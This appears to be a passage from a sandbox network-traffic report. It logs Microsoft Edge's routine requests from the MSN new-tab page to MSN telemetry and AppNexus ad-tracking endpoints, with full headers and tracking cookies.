    Source: global trafficHTTP traffic detected: GET /bounce?%2Fseg%3Fadd%3D5159620%26redir%3Dhttps%253A%252F%252Fib.adnxs.com%252Fsetuid%253Fentity%253D483%2526code%253D0136911D054E6BFC0E90846C04216AB7%2526gdpr%253D0%2526gdpr_consent%253D HTTP/1.1Host: m.adnxs.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /setuid?entity=483&code=0136911D054E6BFC0E90846C04216AB7&gdpr=0&gdpr_consent= HTTP/1.1Host: ib.adnxs.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736578473713&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1Host: browser.events.data.msn.comConnection: keep-aliveContent-Length: 16171sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
    Source: global trafficHTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736578473946&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1Host: browser.events.data.msn.comConnection: keep-aliveContent-Length: 9488sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
    Source: global trafficHTTP traffic detected: GET /bounce?%2Fsetuid%3Fentity%3D483%26code%3D0136911D054E6BFC0E90846C04216AB7%26gdpr%3D0%26gdpr_consent%3D HTTP/1.1Host: ib.adnxs.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736578474725&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1Host: browser.events.data.msn.comConnection: keep-aliveContent-Length: 20831sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
    Source: global trafficHTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736578476341&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1Host: browser.events.data.msn.comConnection: keep-aliveContent-Length: 10308sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
    Source: global trafficHTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736578479355&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1Host: browser.events.data.msn.comConnection: keep-aliveContent-Length: 9313sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
    Source: global trafficHTTP traffic detected: GET /notify/viewed?rid=f7b66e0f99774ee4994a9572d133a3c9&r=infopane&i=3&p=edgechrntp&l=en-us&d=bing&b=Edg&a=dfa64b01-ec54-411d-97b5-76d005271c07&ii=1&c=2556969255498558843&bid=4612d191-d50f-4858-b355-b9340e91f3fd&tid=edgechrntp-infopane-3&ptid=edgechrntp-peekinfopane-1&t=type.msft-content-card&dec=1-1 HTTP/1.1Host: srtb.msn.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
    Source: global trafficHTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736578482833&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1Host: browser.events.data.msn.comConnection: keep-aliveContent-Length: 21272sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
    Source: global trafficHTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736578485347&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1Host: browser.events.data.msn.comConnection: keep-aliveContent-Length: 10380sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
    Source: global trafficHTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736578488354&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1Host: browser.events.data.msn.comConnection: keep-aliveContent-Length: 9386sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
    Source: global trafficHTTP traffic detected: GET /notify/viewed?rid=f7b66e0f99774ee4994a9572d133a3c9&r=resinfopane&i=6&p=edgechrntp&l=en-us&d=bing&b=Edg&a=087acc36-08c1-4daa-8dbd-3c1c710f7f4a&ii=1&c=15351574985914386683&bid=4612d191-d50f-4858-b355-b9340e91f3fd&tid=edgechrntp-resinfopane-6&ptid=edgechrntp-resinfopane-1&t=type.msft-content-card&dec=1-1 HTTP/1.1Host: srtb.msn.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
    Source: global trafficHTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736578491392&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1Host: browser.events.data.msn.comConnection: keep-aliveContent-Length: 10113sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
    Source: global trafficHTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736578491913&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1Host: browser.events.data.msn.comConnection: keep-aliveContent-Length: 8657sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
    Source: global trafficHTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736578494345&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1Host: browser.events.data.msn.comConnection: keep-aliveContent-Length: 10419sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
    Source: global trafficHTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736578497331&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1Host: browser.events.data.msn.comConnection: keep-aliveContent-Length: 10410sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
    Source: global trafficHTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736578500350&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1Host: browser.events.data.msn.comConnection: keep-aliveContent-Length: 10391sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
    Source: global trafficHTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736578503345&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1Host: browser.events.data.msn.comConnection: keep-aliveContent-Length: 9369sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
    Source: global trafficHTTP traffic detected: GET /notify/viewed?rid=f7b66e0f99774ee4994a9572d133a3c9&r=infopane&i=11&p=edgechrntp&l=en-us&d=bing&b=Edg&a=1dd19eb1-735b-470f-9209-d9bb436269a4&ii=1&c=7645241228381444372&bid=4612d191-d50f-4858-b355-b9340e91f3fd&tid=edgechrntp-infopane-11&ptid=edgechrntp-peekInfopane-2&t=type.msft-content-card&dec=1-1 HTTP/1.1Host: srtb.msn.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
    Source: global trafficHTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736578506345&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1Host: browser.events.data.msn.comConnection: keep-aliveContent-Length: 10170sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
    Source: global trafficHTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736578506866&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1Host: browser.events.data.msn.comConnection: keep-aliveContent-Length: 8659sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
    Source: global trafficHTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736578509354&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1Host: browser.events.data.msn.comConnection: keep-aliveContent-Length: 10428sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
    Source: global trafficHTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736578512350&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1Host: browser.events.data.msn.comConnection: keep-aliveContent-Length: 10371sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
